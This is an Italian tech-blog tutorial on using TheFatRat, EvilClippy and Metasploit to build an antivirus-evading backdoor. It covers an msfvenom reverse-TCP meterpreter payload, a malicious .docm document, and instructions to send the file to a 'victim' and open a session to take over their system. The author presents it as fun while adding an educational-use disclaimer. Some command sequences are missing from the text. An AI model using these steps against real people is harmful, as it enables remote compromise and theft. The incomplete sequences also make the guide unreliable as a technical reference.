Cari lettori di Tecnogalaxy, oggi vi parlerò del potentissimo tool TheFatRat, (uno strumento facile da utilizzare per generare Backdoor che bypassano gli antivirus, possibilità di creare attacchi post via browser, dll….. Questo strumento compila un malware con i payload più popolari, quindi il malware compilato può essere eseguito su Windows, Android, Mac.)

Di seguito alcune delle tante funzioni utilizzabili con il tool TheFatRat:

  1. Incorpora Backdoor Apk Android;
  2. Crea Backdoor Php e riconnettiti con TheFatRat;
  3. Bypassa gli antivirus;
  4. FatRat per generare backdoor con MsfVenom;

Dopo aver visto di cosa è capace questo tool iniziamo finalmente con la guida.

Fare attacchi hacker con TheFatRat

Passiamo al divertimento, utilizziamo sempre il nostro caro amico Kali Linux, apriamo una shell e scriviamo il seguente comando per scaricare il tool ed installarlo:

cd Scrivania (nel mio caso)
git clone https://github.com/Screetsec/TheFatRat.git

Scriviamo il comando per installare il tool:

cd TheFatRat
chmod +x setup.sh && ./setup.sh

Per aggiornare FatRat vai nella tua cartella TheFatRat ed esegui:

git pull && chmod +x setup.sh && ./setup.sh

Per aggiornare dalla versione 1.9.3 e successive, eseguire sulla cartella fatrat:

./update && chmod +x setup.sh && ./setup.sh

Adesso dobbiamo scaricare il tool EvilClippy, apriamo una shell e scriviamo il seguente comando per scaricare il tool ed installarlo:

git clone https://github.com/outflanknl/EvilClippy.git

Adesso posizioniamoci nella cartella di EvilClippy scrivendo il comando:

cd EvilClippy

Eseguiamo il comando:

mcs /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

Apriamo una nuova shell e scriviamo:

msfvenom –p windows/meterpreter/reverse_tcp LHOST=10.53.1.47 LPORT=4444 –a x86 –f exe > /root/Scrivania/backdoor.exe

LHOST sarà il vostro indirizzo IP, lo puoi trovare aprendo una nuova sheel e scrivendo il comando iwcofig.

LPORT è la porta che decideremo di mettere in ascolto sul nostro Kali Linux.

Attivare il tool

Adesso è arrivato il momento si attivare TheFatRat, posizioniamoci nella cartella e scriviamo il comando:

TheFatRat

Questo sarà il nostro menù di navigazione con le varie opzioni, come potete vedere abbiamo l’imbarazzo della scelta.

Per il nostro test utilizziamo l’opzione “7

Selezioniamo l’opzione “2” e confermiamo con l’invio.

Adesso dovremo inserire le seguenti informazioni:

Set LHOST IP: il nostro indirizzo IP.

Set LPORT: la porta 4444.

Enter the base ……: il nome che vogliamo dare al nostro file.

Confermiamo con “y”.

Path: scriviamo il percorso dove generare la backdoor.

Adesso diciamo al tool che tipo di Payload vogliamo generare, per il nostro test mettiamo “3”, confermiamo e attendiamo che il tool termini il processo.

Perfetto la nostra backdoor è stata creata nel seguente percorso:

/root/TheFatRat/output/payrool.docm

Apriamo una nuova sheel e scriviamo il seguente comando:

mv /root/TheFatRat/output/payrool.docm /root/EvillClippy/

Posizioniamoci nella cartella di EvillClippy scrivendo il seguente comando:

cd /root/EvilClippy/

Posizioniamoci nella cartella di EvillClippy e scriviamo in sequenza questi comandi:

E poi

A questo punto il nostro file potremo trovarlo nel seguente percorso:

Apriamo una nuova sheel e scriviamo il seguente comando per attivare il nostro server:

Adesso non ci resta che inviare o far scaricare il nostro file alla vittima, apriamo subito una nuovas sheel e scriviamo:

msfdb init “confermiamo con enter”
msfconsole –q “ confermiamo con enter”

Scriviamo in sequenza questi comandi:

Lanciamo l’exploit e attendiamo:

Quando il file verrà aperto vedremo quanto segue, bingo sessione aperta:

Adesso scrivendo il seguente comando:

session 1

e poi

sysinfo

Avremo in mano il sistema della nostra vittima.

Al prossimo articolo!

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.